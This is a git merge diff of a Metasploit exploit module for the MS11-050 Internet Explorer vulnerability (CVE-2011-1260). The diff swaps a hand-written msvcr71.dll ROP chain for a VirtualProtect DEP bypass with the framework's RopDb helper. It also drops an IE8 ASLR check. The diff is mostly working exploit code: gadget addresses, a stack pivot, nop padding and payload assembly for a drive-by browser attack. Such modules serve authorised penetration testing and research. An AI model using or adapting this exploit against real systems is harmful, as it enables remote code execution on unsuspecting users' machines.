Merge branch 'ms11_050_ropdb_update' of https://github.com/wchen-r7/metasploit-framework into wchen-r7-ms11_050_ropdb_update

Author: jvazquez-r7

modules/exploits/windows/browser/ms11_050_mshtml_cobjectelement.rb

@@ -1,7 +1,3 @@
-##
-# $Id$
-##
-
 ##
 # This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
@@ -15,19 +11,14 @@ class Metasploit3 < Msf::Exploit::Remote
 	Rank = NormalRanking
 
 	include Msf::Exploit::Remote::HttpServer::HTML
+	include Msf::Exploit::RopDb
 	include Msf::Exploit::Remote::BrowserAutopwn
 	autopwn_info({
 		:ua_name    => HttpClients::IE,
 		:ua_minver  => "7.0",
 		:ua_maxver  => "8.0",
 		:javascript => true,
-		:os_name    => OperatingSystems::WINDOWS,
-		# If it's IE 8, then we need .net to bypass ASLR
-		:vuln_test  => %Q|
-			if (window.os_detect && ua_ver_eq(window.os_detect.ua_version, "8")) {
-				if (/.NET CLR 2\\.0\\.50727/.test(navigator.userAgent)){ is_vuln = true }else{ is_vuln = false }
-			}
-		|,
+		:os_name    => OperatingSystems::WINDOWS
 	})
 
 	def initialize(info={})
@@ -46,30 +37,29 @@ def initialize(info={})
 				to bypass DEP (Data Execution Prevention).
 			},
 			'License'        => MSF_LICENSE,
-			'Version'        => "$Revision$",
 			'Author'         =>
 				[
 					'd0c_s4vage',   #Discovery, poc
 					'sinn3r',       #ROP (thx corelanc0d3r), Windows 7
-					'bannedit',     #Windows 7
+					'bannedit'      #Windows 7
 				],
 			'References'     =>
 				[
 					['CVE', '2011-1260'],
 					['OSVDB', '72950'],
 					['MSB', 'MS11-050'],
-					['URL', 'http://d0cs4vage.blogspot.com/2011/06/insecticides-dont-kill-bugs-patch.html'],
+					['URL', 'http://d0cs4vage.blogspot.com/2011/06/insecticides-dont-kill-bugs-patch.html']
 				],
 			'DefaultOptions' =>
 				{
 					'EXITFUNC' => 'process',
-					'InitialAutoRunScript' => 'migrate -f',
+					'InitialAutoRunScript' => 'migrate -f'
 				},
 			'Payload'        =>
 				{
 					'Space'    => 500,
 					'BadChars' => "\x00\x09\x0a\x0d'\\",
-					'StackAdjustment' => -3500,
+					'StackAdjustment' => -3500
 				},
 			'Platform'       => 'win',
 			'Targets'        =>
@@ -185,42 +175,16 @@ def on_request_uri(cli, request)
 			return
 		end
 
-		#In case we're using ROP, initialize it now
-		code = ''
-
 		if mytarget['Rop']
-			# !mona -m msvcr71 rop
-			code = [
-				0x7c376402,  # POP EBP # RETN [msvcr71.dll]
-				0x7c376402,  # skip 4 bytes [msvcr71.dll]
-				0x7c347f97,  # POP EAX # RETN [msvcr71.dll]
-				0xfffff800,  # Value to negate, will become 0x00000201 (dwSize)
-				0x7c351e05,  # NEG EAX # RETN [msvcr71.dll]
-				0x7c354901,  # POP EBX # RETN [msvcr71.dll]
-				0xffffffff,
-				0x7c345255,  # INC EBX # FPATAN # RETN [msvcr71.dll]
-				0x7c352174,  # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN [msvcr71.dll]
-				0x7c344f87,  # POP EDX # RETN [msvcr71.dll]
-				0xffffffc0,  # Value to negate, will become 0x00000040
-				0x7c351eb1,  # NEG EDX # RETN [msvcr71.dll]
-				0x7c34d201,  # POP ECX # RETN [msvcr71.dll]
-				0x7c38b001,  # &Writable location [msvcr71.dll]
-				0x7c34b8d7,  # POP EDI # RETN [msvcr71.dll]
-				0x7c347f98,  # RETN (ROP NOP) [msvcr71.dll]
-				0x7c364802,  # POP ESI # RETN [msvcr71.dll]
-				0x7c3415a2,  # JMP [EAX] [msvcr71.dll]
-				0x7c347f97,  # POP EAX # RETN [msvcr71.dll]
-				0x7c37a151,  # ptr to &VirtualProtect() - 0x0EF [IAT msvcr71.dll]
-				0x7c378c81,  # PUSHAD # ADD AL,0EF # RETN [msvcr71.dll]
-				0x7c345c30,  # ptr to 'push esp #  ret ' [msvcr71.dll]
-			].pack("V*")
-
-			code << "\x90"*20                 #Nops
-			code << "\xeb\x04\xff\xff"        #Jmp over the pivot
-			code << [mytarget.ret].pack('V')  #Stack pivot
+			p  = make_nops(44)             #Nops
+			p << "\xeb\x04\xff\xff"        #Jmp over the pivot
+			p << [mytarget.ret].pack('V')  #Stack pivot
+			p << payload.encoded
+
+			rop_payload = generate_rop_payload('java', p)
 		end
 
-		code << payload.encoded
+		code = (rop_payload) ? rop_payload : payload.encoded
 
 		# fill the vtable
 		vtable = [mytarget['TargetAddr']].pack('V*')